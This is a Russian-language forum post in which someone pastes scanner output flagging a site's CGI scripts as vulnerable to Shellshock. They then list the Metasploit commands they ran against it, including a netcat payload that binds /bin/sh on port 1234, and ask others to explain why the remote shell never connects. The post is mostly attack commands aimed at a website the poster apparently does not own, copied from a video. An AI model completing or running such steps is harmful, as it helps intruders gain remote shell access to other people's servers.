Server banner has changed from 'Apache' to 'AkamaiGHost' which may suggest a WAF, load balancer or proxy is in place
+ OSVDB-112004: /cgi-bin/admin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (
http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/administrator.cgi: Site appears vulnerable to the 'shellshock' vulnerability (
http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/authLogin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (
http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/bb-hist.sh: Site appears vulnerable to the 'shellshock' vulnerability (
http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).
Открываю Метасплойт.... пишу туда:
search 2014-6278
нашел 3 експлойта, вел дальше так set auxiliary/scanner/http/apache_mod_cgi_bash_env
set CMD /usr/bin/nc -l -p 1234 -e /bin/sh зачем не знаю, увидел точно такую же в видео в Ютубе и сделал так же... Сылка на видео в конце будет
дальше set RHOSTS 0.0.0.0 (сайт)
set TARGETURI /cgi-bin/administrator.cgi
exploit пишет что прошел потом открываю консоль пишу:
nc 0.0.0.0 1234 и там не чего не выдает кароче.....
делал по этому видео
Кому не лень подскажите че к чему